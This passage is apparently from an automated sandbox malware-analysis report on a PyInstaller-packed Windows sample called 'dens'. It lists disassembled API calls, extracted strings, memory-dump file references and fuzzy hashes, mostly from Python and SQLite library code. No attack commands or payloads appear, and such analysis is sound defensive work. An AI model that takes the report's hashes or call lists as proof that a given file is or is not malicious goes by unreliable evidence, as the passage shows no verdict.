                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: %s %T already exists$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
                                                                                                                                                                                                                                              • API String ID: 3510742995-2846519077
                                                                                                                                                                                                                                              • Opcode ID: 349c116bc76760f8f34a0ecd5c4fb5f668b809d4acdf9a5c8cd5a762cc9d7692
                                                                                                                                                                                                                                              • Instruction ID: 742658f3d4dcf168faa6b0cf330d26e20e22147c52754771243799cebb1b1003
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 349c116bc76760f8f34a0ecd5c4fb5f668b809d4acdf9a5c8cd5a762cc9d7692
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12029F76B0878286EB28DF219420BA937A1FB85B84F804275DE6D47BDADF3DE551C700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF62C10F0AA,?,?,-00000018,00007FF62C10AD53,?,?,?,00007FF62C10AC4A,?,?,?,00007FF62C105F3E), ref: 00007FF62C10EE8C
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF62C10F0AA,?,?,-00000018,00007FF62C10AD53,?,?,?,00007FF62C10AC4A,?,?,?,00007FF62C105F3E), ref: 00007FF62C10EE98
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                              • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                              • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                              • Instruction ID: e29bd8be6c23f54e85a35f3a29795efa04a20659b168910b71ed527fba9d14ce
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C412222B29A5682EF15CB17AC096752391BF09BF0F884139DD5DC7794EF3CE4558306
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF62C0F3706,?,00007FF62C0F3804), ref: 00007FF62C0F2C9E
                                                                                                                                                                                                                                              • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF62C0F3706,?,00007FF62C0F3804), ref: 00007FF62C0F2D63
                                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF62C0F2D99
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                              • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                              • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                              • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                              • Instruction ID: 86ae82494796241eec8c030b2adb68636609e58a481904699e42cec4fd752ebc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE312672B08B4046EF20AB29BC152AA6695BF88BE8F400136EF4DD3759EF3DD546C345
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy$memset$memmove
                                                                                                                                                                                                                                              • String ID: "%w" $%Q%s
                                                                                                                                                                                                                                              • API String ID: 3094553269-1987291987
                                                                                                                                                                                                                                              • Opcode ID: 174a6591da61526b4cbfd3a7c99bc796086c213a03ae54d3f04796288f9b0029
                                                                                                                                                                                                                                              • Instruction ID: b2b6b384b1cc412e93a151b719c3b158960dfbe63437ee4c3b018ee0e7162056
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 174a6591da61526b4cbfd3a7c99bc796086c213a03ae54d3f04796288f9b0029
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BAC1D266B08B8286EB18CB56A460F7A67A0FB55BA0F854675DE7E077D9CF3CE450C300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 3510742995-3727861699
                                                                                                                                                                                                                                              • Opcode ID: 8f8de6ae6b6d490a4055b467e29cbc29010112429b2da8af393b7bcc79d98a68
                                                                                                                                                                                                                                              • Instruction ID: f168196b0d6f17fad30bd98f85815642359dd0ad690d7ca5e31ca2b620887491
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f8de6ae6b6d490a4055b467e29cbc29010112429b2da8af393b7bcc79d98a68
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5B15732B0C2D196D7688B18E464ABE7BA1FF84784F448275DB9A877C9DE3CE044D710
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$misuse
                                                                                                                                                                                                                                              • API String ID: 3510742995-1404302391
                                                                                                                                                                                                                                              • Opcode ID: 06dc864b5da4365f93e2859b549b119eeb8d62f17daef2259aa9f20ff05c9f44
                                                                                                                                                                                                                                              • Instruction ID: 2898dc0bc6d0c77f350822d1e0702d0b80dd09fddefe09f1a394a875fc8e29e1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 06dc864b5da4365f93e2859b549b119eeb8d62f17daef2259aa9f20ff05c9f44
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45F15E29B09B4285EB6C9B1AA464B7927A4FF40B84F9481B5DE7D4B7D9CF3CE4468300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Arg_ArgumentFromStringSubtypeType_Unicode_
                                                                                                                                                                                                                                              • String ID: a unicode character$argument$category
                                                                                                                                                                                                                                              • API String ID: 1318908108-2068800536
                                                                                                                                                                                                                                              • Opcode ID: c31e599aff6ce8fd118d7930930d13bb61e4023c7ccaaddb711cf16cebfbc0cd
                                                                                                                                                                                                                                              • Instruction ID: c2931c64f47234939bc8ec9bf7b639f15de5d7abe0b8a41343b31a0e41cb8010
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c31e599aff6ce8fd118d7930930d13bb61e4023c7ccaaddb711cf16cebfbc0cd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E51FA62B18A468AEB6D9B05D470A7873A1FF84784F440075DA6F477DCDF2DE89AC304
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Arg_ArgumentFromStringSubtypeType_Unicode_
                                                                                                                                                                                                                                              • String ID: a unicode character$argument$bidirectional
                                                                                                                                                                                                                                              • API String ID: 1318908108-2110215792
                                                                                                                                                                                                                                              • Opcode ID: 2be184d8cc6ee1ee00809d45acc887d572eb9887141ab2374770304697e252f3
                                                                                                                                                                                                                                              • Instruction ID: 630a4135315aa349ad6959478f77625adc22f923d3a57087a04d8eed03e2eb5f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2be184d8cc6ee1ee00809d45acc887d572eb9887141ab2374770304697e252f3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8941F566B18A8389EB5D8B15D470B7A33A1FF44780F440079DA6F436DCCE2CE89AC314
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF62C0FDF7A,?,?,?,00007FF62C0FDC6C,?,?,?,00007FF62C0FD869), ref: 00007FF62C0FDD4D
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF62C0FDF7A,?,?,?,00007FF62C0FDC6C,?,?,?,00007FF62C0FD869), ref: 00007FF62C0FDD5B
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF62C0FDF7A,?,?,?,00007FF62C0FDC6C,?,?,?,00007FF62C0FD869), ref: 00007FF62C0FDD85
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF62C0FDF7A,?,?,?,00007FF62C0FDC6C,?,?,?,00007FF62C0FD869), ref: 00007FF62C0FDDF3
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF62C0FDF7A,?,?,?,00007FF62C0FDC6C,?,?,?,00007FF62C0FD869), ref: 00007FF62C0FDDFF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                                              • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                              • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                              • Instruction ID: 64fc88088f0d49555f460cf314bb8f2f1eacb566aae9c479917a49c5146b055a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E31D421B1A74299EE12DF06AC006B923E4FF58BB4F594535ED1D87384EF3DE484832A
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF62C0F351A,?,00000000,00007FF62C0F3F1B), ref: 00007FF62C0F2AA0
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                              • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                              • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                              • Instruction ID: 6044575e71d00e65264cb3e3816727449ea070c0a7c1d4663241f63a3d3b7f1a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9921B272A18B8186EB20DB55BC867E66394FB887E4F400136FE8C83659DF7CD2858745
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 995526605-0
                                                                                                                                                                                                                                              • Opcode ID: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                                                                                                                                                                              • Instruction ID: 27f1923d861f5aa6c08d6ba791f73f5243ecfc73ee9fb1d446c23abad981e651
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12215121A0C64246EF109B59B94526EA3A4EF867F0F600335EA6D83BE4DFBDD4858705
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                                              • Opcode ID: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                                                                                                                                                                                                              • Instruction ID: 3915a7cde2db868862b4d48efa27c30027c4c8515d8731f4f2ef2bd4d12fe783
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57212C24B0C68281FE58A325AE5F13962525F4A7B0F144634DD7EC6ACAEE3DB4608303
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                              • String ID: CONOUT$
                                                                                                                                                                                                                                              • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                              • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                              • Instruction ID: f5b20213c2993350d6523f7d901f06bbbee1cccb359ffe2672accee5f38b1499
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B119321B18A4186EB508B5AFC5A32963A0FF99BF4F040234EA5DC7794DFBCE8148742
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _PyArg_CheckPositional.PYTHON312 ref: 00007FFDFAA536E7
                                                                                                                                                                                                                                              • _PyArg_BadArgument.PYTHON312 ref: 00007FFDFAA5371A
                                                                                                                                                                                                                                                • Part of subcall function 00007FFDFAA511B0: PyUnicode_CompareWithASCIIString.PYTHON312 ref: 00007FFDFAA511E2
                                                                                                                                                                                                                                                • Part of subcall function 00007FFDFAA511B0: PyUnicode_CompareWithASCIIString.PYTHON312 ref: 00007FFDFAA511FA
                                                                                                                                                                                                                                                • Part of subcall function 00007FFDFAA511B0: PyType_IsSubtype.PYTHON312 ref: 00007FFDFAA5121D
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmpDownload File
